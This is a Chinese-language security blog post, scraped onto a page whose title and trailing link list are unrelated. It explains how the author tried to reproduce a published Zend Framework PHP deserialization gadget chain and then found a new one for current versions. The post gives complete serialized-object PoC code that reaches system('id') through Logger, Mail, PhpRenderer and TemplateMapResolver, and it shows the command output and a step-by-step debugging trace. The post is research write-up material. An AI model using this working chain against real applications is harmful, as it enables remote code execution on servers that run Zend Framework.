当前位置: 首页 > news >正文

商城网站设计教程企业网站建设应具备的功能

商城网站设计教程,企业网站建设应具备的功能,怎么查询备案号,北京网站建设流程前言 在推特上的PT SWARM账号发布了一条消息。 一个名为Zend Framework的php框架出现了新的gadget chain#xff0c;可导致RCE。笔者尝试复现#xff0c;但失败了。所幸#xff0c;我基于此链#xff0c;发现在这个框架的最新版本中的另一条链。 复现过程 这里使用vscod…前言 在推特上的PT SWARM账号发布了一条消息。 一个名为Zend Framework的php框架出现了新的gadget chain可导致RCE。笔者尝试复现但失败了。所幸我基于此链发现在这个框架的最新版本中的另一条链。 复现过程 这里使用vscode的ssh链接Ubuntu虚拟机Ubuntu虚拟机内开有php7.2nginxxdebug的docker环境。使用composer安装框架。 这里偷懒使用官方提供的MVC骨架安装指令: composer create-project zendframework/skeleton-application path/to/install。根据下链有一些包这个骨架还没安装。使用composer require安装zendframework/zend-filter、zendframework/zend-log、zendframework/zend-mail。 这里放 复现环境使用docker-compose up -d即可。 首先需要注意的是ZF框架已经停止维护了。这是一个相当有年头的框架了我估计不会发cve要不然也不会公布… 原gadget chain ?phpclass Zend_Log {protected $_writers;function __construct($x){$this-_writers $x;} }class Zend_Log_Writer_Mail {protected $_eventsToMail;protected $_layoutEventsToMail;protected $_mail;protected $_layout;protected $_subjectPrependText;public function __construct($eventsToMail,$layoutEventsToMail,$mail,$layout) {$this-_eventsToMail $eventsToMail;$this-_layoutEventsToMail $layoutEventsToMail;$this-_mail $mail;$this-_layout $layout;$this-_subjectPrependText null;} }class Zend_Mail { }class Zend_Layout {protected $_inflector;protected $_inflectorEnabled;protected $_layout;public function __construct($inflector,$inflectorEnabled,$layout) {$this-_inflector $inflector;$this-_inflectorEnabled $inflectorEnabled;$this-_layout ){} . $layout . /*;} }class Zend_Filter_Callback {protected $_callback create_function;protected $_options []; }class Zend_Filter_Inflector {protected $_rules [];public function __construct(){$this-_rules[script] [new Zend_Filter_Callback()];} }$code phpinfo();exit;;$a new \Zend_Log([new \Zend_Log_Writer_Mail([1],[],new \Zend_Mail,new \Zend_Layout(new Zend_Filter_Inflector(),true,$code))] );echo urlencode(serialize([test $a])); 我把序列化数据打进去后发现这些类都变成了匿名类简而言之就是ClassLoader没有找到这些类。这就很怪了。之后才发现这些类的命名使用的是psr-0的规范。这个规范是放在以前php没有命名空间的时候使用的早过时了。现在是psr-4。composer默认也是按照psr-4的规范安装的。 也就是说这个链的可利用版本大致是相当古老的了 我尝试安装更老旧版本的ZF框架。果然老版本框架要求php版本在5.3以下……于是不打算继续复现… 新链发现 我尝试将上面poc的代码转换为psr-4规范发现有一些类还有有一些类则完全不在了例如Zend_Layout类在ZF包的新版本中就没有。 我尝试利用现有的类进行测试最终在上链基础上找到了新版本的链。 namespace Zend\Log {class Logger{protected $writers;function __construct(){$this-writers [new \Zend\Log\Writer\Mail()];}} }namespace Zend\Log\Writer {class Mail {protected $mail;protected $eventsToMail;protected $subjectPrependText;function __construct(){$this-mail new \Zend\View\Renderer\PhpRenderer();$this-eventsToMail [id];$this-subjectPrependText null;}} }namespace Zend\View\Renderer {class PhpRenderer {private $__helpers;function __construct(){$this-__helpers new \Zend\View\Resolver\TemplateMapResolver();}} }namespace Zend\View\Resolver {class TemplateMapResolver {protected $map;function __construct(){$this-map [setBody system,];}} }namespace {$payload new \Zend\Log\Logger();echo urlencode(serialize($payload)); }/* OUTPUT: uid33(www-data) gid33(www-data) groups33(www-data) */ 对此链进行调试 调试 // Zend\Log\Logger public function __destruct() {foreach ($this-writers as $writer) {try {$writer-shutdown();} catch (\Exception $e) {}} } 起点是Zend\Log\Logger类的__destruct方法这其实就是复现的那条链的Zend_Log类新版本改名为此。 可以看到这里调用了一个变量$writer的shutdown方法。那么接下来就有两个思路。 $writer设为没有shutdown方法的实例调用其__call方法$writer设为有shutdown方法的实例调用其shutdown方法 我这里找到了Zend\Log\Writer\Mail类有这个shutdown方法同时找到了一个比较好用的__call方法。 public function shutdown() {if (empty($this-eventsToMail)) {return;}if ($this-subjectPrependText ! null) {$numEntries $this-getFormattedNumEntriesPerPriority();$this-mail-setSubject({$this-subjectPrependText} ({$numEntries}));}$this-mail-setBody(implode(PHP_EOL, $this-eventsToMail));try {$this-transport-send($this-mail);} catch (TransportException\ExceptionInterface $e) {trigger_error(unable to send log entries via email; .message {$e-getMessage()}; .code {$e-getCode()}; .exception class . get_class($e),E_USER_WARNING);} } 这个方法调用了很多其它的方法一开始没什么思路再看看刚才说的__call方法。 // Zend\View\Renderer\PhpRenderer public function __call($method, $argv) {$plugin $this-plugin($method);if (is_callable($plugin)) {return call_user_func_array($plugin, $argv);}return $plugin; } 可以看到call_user_func_array并没有限制类通常会这么写call_user_func_array([$this, $method], $argv)以防止调用类外方法。这里可能会导致RCE跟入plugin方法 public function getHelperPluginManager() {if (null $this-__helpers) {$this-setHelperPluginManager(new HelperPluginManager(new ServiceManager()));}return $this-__helpers; }public function plugin($name, array $options null) {return $this-getHelperPluginManager()-get($name, $options); } 跟入后首先会调用getHelperPluginManager方法其返回值可以被控制。问题就是接下来的get方法了。这里找到一个好用的get方法。 // Zend\View\Resolver\TemplateMapResolver public function has($name) {return array_key_exists($name, $this-map); }public function get($name) {if (! $this-has($name)) {return false;}return $this-map[$name]; } Zend\View\Resolver\TemplateMapResolver类中的get方法明显是可以控制返回值的。那么之前plugin的返回值也就可以随心所欲了。之后调用__call方法里的call_user_func_array的第一个参数就随便我们控制了。 但现在还有一个问题就是call_user_func_array的第二个参数无法控制。这时我想起了之前的shutdown方法。 public function shutdown() {if (empty($this-eventsToMail)) {return;}if ($this-subjectPrependText ! null) {$numEntries $this-getFormattedNumEntriesPerPriority();$this-mail-setSubject({$this-subjectPrependText} ({$numEntries}));}/* 注意这一句 */$this-mail-setBody(implode(PHP_EOL, $this-eventsToMail));try {$this-transport-send($this-mail);} catch (TransportException\ExceptionInterface $e) {trigger_error(unable to send log entries via email; .message {$e-getMessage()}; .code {$e-getCode()}; .exception class . get_class($e),E_USER_WARNING);} } 很明显我们想让终点的call_user_func_array的第二个参数有值。需要之前调用不存在方法时有参数。很明显上面shutdown方法里有这么一句符合我们要求。 $this-mail-setBody(implode(PHP_EOL, $this-eventsToMail));首先可以调用__call方法然后$this-eventsToMail经过implode函数可控。很明显这个方法的参数可控直接芜湖。 调用堆栈 心得 可以看到上面这样一条gadget链的寻找并没有那么困难。关键便是抓住php本身的特性才能运用得灵活自如。
http://www.hkea.cn/news/14405892/

相关文章:

  • 网站建设有那几个类型百度上打广告怎么收费
  • 90设计网站创建时间南京哪里有做网站的
  • 找人做网站注意哪些山东省住房和城乡建设厅网站定额站
  • 二级域名解析网站google和百度等相关网站的广告词
  • 回收手表网站微信开放平台网站应用
  • php源码网站修改效果图制作代做网站
  • 做app简单还是网站设计标志公司
  • 五道口网站建设北京工程造价信息网官网
  • 做推文封面的网站go网站开发
  • 河南做个人网站手机咋做网站
  • 建站平台wp设计说明模版
  • 江门公司网站制作成都门户网站建设公司
  • wordpress怎么建立网站WordPress有时候快有时候慢
  • 微网站建设及微信推广方案ppt模板成都市建筑设计研究院
  • 房产网站建设方案论文凡客诚品特色
  • 闲鱼网站如何赚钱ppt模板免费素材
  • 电子网站搜索引擎怎么做南沙哪有做网站的
  • 万网 网站托管微商分销商城
  • 360网站 备案为什么外包会把人干废
  • 什么是响应式网站建设网站受到攻击
  • 做网络写手赚钱的网站购物网站后台管理系统模板
  • 公司网站建设制作全包网站建设就问山东聚搜网络f
  • 网站如何做淘宝联盟推广电商网站建设课件
  • 原网站开发新功能湖南营销型网站建设 在线磐石网络
  • 自助建网站哪个好网站维护建设招标
  • 网站转出来个网站吧好人一生平安2021
  • 注册公司网上核名网站哈尔滨关键词优化平台
  • 建设php网站网站优化公司大家好
  • wordpress区分移动站静态网站登陆怎么做
  • 我有服务器怎么做网站网站做seo